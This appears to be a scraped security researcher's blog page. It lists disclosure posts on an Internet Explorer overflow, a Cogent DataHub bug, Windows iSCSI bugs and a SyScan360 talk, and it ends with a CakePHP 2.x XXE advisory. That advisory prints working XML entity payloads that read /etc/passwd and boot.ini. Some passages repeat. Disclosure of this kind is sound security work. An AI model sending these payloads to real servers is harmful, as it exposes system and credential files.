In this months bulletin Microsoft has fixed multiple vulnerabilities in Internet Explorer including one which was mine. It was an integer overflow in the CShadow filter which could lead to remote code execution. It affected Internet Explorer 10 and 11. You can find the original ZDI advisory here and the Microsoft Bulletin here.
There is some confusion when it comes to CVE assignment, as Microsoft acknowledged me for CVE-2015-0035 (also credited to Sky) while ZDI marked my bug CVE-2015-0036 which is credited to an anonymous researcher on the bulletin page. I will update this post if something changes regarding to that.
Showing posts with label vulnerability. Show all posts
Showing posts with label vulnerability. Show all posts
Tuesday, 10 February 2015
Tuesday, 22 July 2014
SyScan360 2014 - Mobile Browsers Security: iOS
Last week together with Lukasz Pilorz I was speaking about mobile browsers security on iOS @ SyScan360 in Beijing. Visiting China for the first time was a great experience, and the conference itself was just awesome. Cool people, very technical talks and good organization is what it makes this event exceptional.
Our slides are already available for download from the conference site here.
Our slides are already available for download from the conference site here.
Monday, 19 May 2014
CVE-2014-3788 and MS14-028
Zero Day Initiative (ZDI) has published another advisory for a heap buffer overflow
vulnerability in Cogent DataHub webserver that i found. The bug occured when passing a negative value in the Content-Length header. The original advisory can be read here ZDI-14-135.
Recently i also have been acknowledged by Microsoft for responsible disclosure (through SSD) of two denial of service vulnerabilities affecting the iSCSI Target (CVE-2014-0255 and CVE-2014-0256). MS Bulletin can be found here MS14-028.
Recently i also have been acknowledged by Microsoft for responsible disclosure (through SSD) of two denial of service vulnerabilities affecting the iSCSI Target (CVE-2014-0255 and CVE-2014-0256). MS Bulletin can be found here MS14-028.
Monday, 16 July 2012
CakePHP 2.x XXE injection
# Exploit title: CakePHP XXE injection |
# Software Link: http://www.cakephp.org |
# Tested on: Windows and Linux# CVE: CVE-2012-4399 |
# http://h0wl.pl |
1. Background
Short description from the project website: "CakePHP makes building web applications simpler, faster and require less code."
2. Vulnerability
CakePHP is vulnerable to XML eXternal Entity injection. The class responsible for building XML (it uses PHP SimpleXML) does allow local file inclusion.
3. Proof of Concept
Linux:
<!DOCTYPE cakephp [
<!ENTITY payload SYSTEM "file:///etc/passwd" >]>
<request>
<xxe>&payload;</xxe>
</request>
Windows:
<!DOCTYPE cakephp [
<!ENTITY payload SYSTEM "file:///C:/boot.ini" >]>
<request>
<xxe>&payload;</xxe>
</request>
4. Fix
Fix applied in version 2.2.1 and 2.1.5. See official security release:
http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1
5. Timeline
1.07.2012 - vulnerability reported
13.07.2012 - response from CakePHP
14.07.2012 - confirmed and fix release
<!DOCTYPE cakephp [
<!ENTITY payload SYSTEM "file:///etc/passwd" >]>
<request>
<xxe>&payload;</xxe>
</request>
Windows:
<!DOCTYPE cakephp [
<!ENTITY payload SYSTEM "file:///C:/boot.ini" >]>
<request>
<xxe>&payload;</xxe>
</request>
4. Fix
Fix applied in version 2.2.1 and 2.1.5. See official security release:
http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1
5. Timeline
1.07.2012 - vulnerability reported
13.07.2012 - response from CakePHP
14.07.2012 - confirmed and fix release
Subscribe to:
Posts (Atom)